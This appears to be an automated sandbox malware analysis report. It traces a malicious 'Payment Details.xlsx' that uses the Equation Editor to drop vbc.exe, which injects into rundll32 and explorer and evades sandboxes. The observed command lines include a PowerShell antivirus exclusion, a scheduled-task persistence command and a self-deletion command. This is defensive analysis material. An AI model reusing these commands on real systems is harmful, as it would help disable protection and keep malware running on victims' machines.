          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025AE6C1
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025A4680
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025D57C3
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025AC7BC
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0262579A
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025DD47D
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025B1489
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025D5485
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025E6540
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025A351F
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025BC5F0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_02653A83
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025C7B00
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0259FBD7
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0262DBDA
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0264CBA4
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025AC85C
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025C286D
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0263F8EE
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_02625955
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025B69FE
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025A29B2
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0264098E
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025BEE4C
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025D2E2F
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025CDF7C
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025B0F3F
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025ACD5B
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025D0D3B
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0263FDDD
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000AD5B6
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000AD931
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000ADAC3
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00092D87
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00092D90
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00099E60
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00092FB0
          Source: C:\Users\Public\vbc.exe | Code function: String function: 00B23F92 appears 132 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 00ADE2A8 appears 60 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 00ADDF5C appears 130 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 00B2373B appears 253 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 00B4F970 appears 84 times
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 0260F970 appears 81 times
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 0259DF5C appears 118 times
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 0259E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 025E3F92 appears 108 times
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 025E373B appears 238 times
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041A370 NtCreateFile
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041A420 NtReadFile
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041A4A0 NtClose
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041A550 NtAllocateVirtualMemory
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041A36B NtCreateFile
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041A41A NtReadFile
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041A49C NtClose
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AD00C4 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AD0078 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AD0048 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACF9F0 NtClose,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACF900 NtReadFile,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFAE8 NtQueryInformationProcess,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFAD0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFBB8 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFB68 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFC90 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFC60 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFD8C NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFDC0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFEA0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFED0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFFB4 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AD0060 NtQuerySection
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AD01D4 NtSetValueKey
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AD010C NtOpenDirectoryObject
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AD07AC NtCreateMutant
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AD0C40 NtGetContextThread
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AD10D0 NtOpenProcessToken
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AD1148 NtOpenThread
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACF8CC NtWaitForSingleObject
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACF938 NtWriteFile
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AD1930 NtSetContextThread
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFAB8 NtQueryValueKey
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFA20 NtQueryInformationFile
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFA50 NtEnumerateValueKey
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFBE8 NtQueryVirtualMemory
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFB50 NtCreateKey
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFC30 NtOpenProcess
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFC48 NtSetInformationFile
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AD1D80 NtSuspendThread
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFD5C NtEnumerateKey
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFE24 NtWriteVirtualMemory
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFFFC NtCreateProcessEx
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ACFF34 NtQueueApcThread
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0036A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0036A042 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025900C4 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025907AC NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FAD0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FAE8 NtQueryInformationProcess,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FAB8 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FB50 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FB68 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FBB8 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258F900 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258F9F0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FED0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FFB4 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FC60 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FDC0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FD8C NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_02590048 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_02590078 NtResumeThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_02590060 NtQuerySection
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025910D0 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_02591148 NtOpenThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0259010C NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025901D4 NtSetValueKey
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FA50 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FA20 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FBE8 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258F8CC NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258F938 NtWriteFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_02591930 NtSetContextThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FE24 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FEA0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FF34 NtQueueApcThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FFFC NtCreateProcessEx
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FC48 NtSetInformationFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_02590C40 NtGetContextThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FC30 NtOpenProcess
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FC90 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0258FD5C NtEnumerateKey
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_02591D80 NtSuspendThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000AA370 NtCreateFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000AA420 NtReadFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000AA4A0 NtClose
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000AA550 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000AA36B NtCreateFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000AA41A NtReadFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000AA49C NtClose
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E90000 page execute and read and write
          Source: vbc[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: OmnbtuhFsJys.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Payment Details.xlsx | Virustotal: Detection: 36%
          Source: Payment Details.xlsx | ReversingLabs: Detection: 33%
          Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................#...............(.P.....................................................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................#...............(.P.....................................................0.......#.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ......................../...............(.P.....................................................0......./.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ......................../...............(.P.....................................................0......./.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................;...............(.P.............................<.......................0.......;...............|.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................;...............(.P.............................W.......................0.......;.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......x.......".......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................G...............(.P.....................................................0.......G.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................S...............(.P.....................................................0.......S.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................S...............(.P.....................................................0.......S.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................_.......s.J.y.s...e.x.e.................................................0......._.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................_...............(.P.............................:.......................0......._.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................k...............(.P.............................q.......................0.......k.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................k...............(.P.....................................................0.......k.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......x.......2.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................w...............(.P.....................................................0.......w.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................................................0.......................l.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................................................0...............x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ .......(.P.............................@.......................0...............x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.............................[.......................0...............x...............................
          Source: C:\Windows\SysWOW64\schtasks.exe | Console Write: ..................(...............(.....(.P.....0.......(...............G.......................................................................
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Payment Details.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD45E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@13/26@1/2
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, vbc.exe, 00000009.00000003.473074012.0000000000930000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.472123384.00000000007D0000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.509705783.0000000000C40000.00000040.00000001.sdmp, rundll32.exe
          Source: Binary string: rundll32.pdb source: vbc.exe, 00000009.00000002.508502052.00000000006F9000.00000004.00000020.sdmp, vbc.exe, 00000009.00000002.506009358.0000000000030000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: vbc[1].exe.2.dr, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: vbc.exe.2.dr, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: OmnbtuhFsJys.exe.4.dr, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.vbc.exe.80000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.vbc.exe.80000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.4.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.5.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.3.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.9.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.1.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.7.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.2.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_002F1298 push esp; retn 0023h 4_2_002F1321
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_002F9B39 push ss; ret 4_2_002F9B40
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_002F9B02 push ebx; ret 4_2_002F9B03
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_002F8F9A push edx; ret 4_2_002F8F9B
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_004171DD push eax; retf 9_2_004171DE
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00417AC9 push edi; retf 9_2_00417ACE
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041A2E3 pushad ; iretd 9_2_0041A2E4
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041D4C5 push eax; ret 9_2_0041D518
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041D57C push eax; ret 9_2_0041D582
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041D512 push eax; ret 9_2_0041D518
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041D51B push eax; ret 9_2_0041D582
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ADDFA1 push ecx; ret 9_2_00ADDFB4
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0036E9B5 push esp; retn 0000h 9_2_0036EAE7
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0036EB1E push esp; retn 0000h 9_2_0036EB1F
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0036EB02 push esp; retn 0000h 9_2_0036EB03
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0259DFA1 push ecx; ret 11_2_0259DFB4
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000A71DD push eax; retf 11_2_000A71DE
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000AA2E3 pushad ; iretd 11_2_000AA2E4
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000AD4C5 push eax; ret 11_2_000AD518
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000AD51B push eax; ret 11_2_000AD582
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000AD512 push eax; ret 11_2_000AD518
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000AD57C push eax; ret 11_2_000AD582
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_000A7AC9 push edi; retf 11_2_000A7ACE
          Source: initial sample | Static PE information: section name: .text entropy: 7.77362197724
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEB
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: vbc.exe PID: 3028, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
